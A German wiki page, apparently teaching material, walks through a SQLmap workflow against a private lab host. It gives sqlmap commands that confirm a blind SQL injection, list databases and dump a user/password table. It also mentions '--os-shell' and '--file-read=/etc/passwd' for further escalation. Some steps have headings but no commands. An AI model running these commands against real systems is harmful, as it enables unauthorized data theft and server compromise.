SQLmap Workflow

Aus Xinux Wiki
Version vom 15. September 2025, 17:14 Uhr von Thomas.will (Diskussion | Beiträge) (Die Seite wurde neu angelegt: „= SQLmap Workflow = ;Einleitung: SQLmap automatisiert die Ausnutzung von SQL-Injection-Schwachstellen. Der Ablauf erfolgt schrittweise: erst Bestätigung, da…“)
(Unterschied) ← Nächstältere Version | Aktuelle Version (Unterschied) | Nächstjüngere Version → (Unterschied)
Zur Navigation springen Zur Suche springen

SQLmap Workflow

Einleitung

SQLmap automatisiert die Ausnutzung von SQL-Injection-Schwachstellen. Der Ablauf erfolgt schrittweise: erst Bestätigung, dann systematische Informationsgewinnung.

1. Test auf Verwundbarkeit

  • sqlmap -u "http://10.0.10.108/sql-blind.php" --data="username=test" --batch
  • Erkenntnis: Parameter username ist verwundbar (boolean-based blind, error-based, time-based).
  • DBMS erkannt: MariaDB/MySQL

2. Version und Banner auslesen

3. Datenbanken auflisten

  • sqlmap -u "http://10.0.10.108/sql-blind.php" --data="username=test" --dbs
  • Erkenntnis: Übersicht aller vorhandenen Datenbanken (z. B. verwaltung, information_schema).

4. Tabellen in einer Datenbank auflisten

5. Spalten in einer Tabelle auflisten

6. Daten exfiltrieren

  • sqlmap -u "http://10.0.10.108/sql-blind.php" --data="username=test" -D verwaltung -T my_auth -C user,pass --dump
  • Erkenntnis: Klaretextdaten der Benutzer (User/Passwort) liegen vor.

7. Optional: Weitere Möglichkeiten

  • --os-shell → Versuch, Betriebssystembefehle auszuführen
  • --file-read=/etc/passwd → Datei auf dem Server auslesen
  • Erkenntnis: Eskalation möglich, wenn DB-User ausreichende Rechte hat.

Fazit

SQLmap liefert einen strukturierten Weg: Von der Bestätigung der Schwachstelle über die Datenbank- und Tabellenstruktur bis zur Exfiltration der Daten. Jeder Schritt bringt eine konkrete Erkenntnis und baut auf dem vorigen auf.